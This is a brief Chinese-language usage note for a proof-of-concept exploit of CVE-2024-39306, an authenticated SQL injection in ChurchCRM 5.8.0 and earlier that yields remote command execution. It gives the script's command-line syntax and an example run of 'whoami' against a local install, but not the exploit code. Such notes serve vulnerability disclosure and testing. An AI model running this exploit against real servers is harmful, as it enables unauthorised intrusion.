此脚本是CVE-2024-39306的概念验证(PoC),由于存在SQL注入漏洞,经过身份验证的用户可以在运行ChurchCRM <= 5.8.0的服务器上执行任意命令,从而实现远程代码执行(RCE)。
python3 CVE-2024-39306.py -u <用户名> -p <密码> -b <URL> -c <命令>
示例:python3 CVE-2024-39306.py -u FirstLast -p Password123 -b http://localhost/churchcrm -c whoami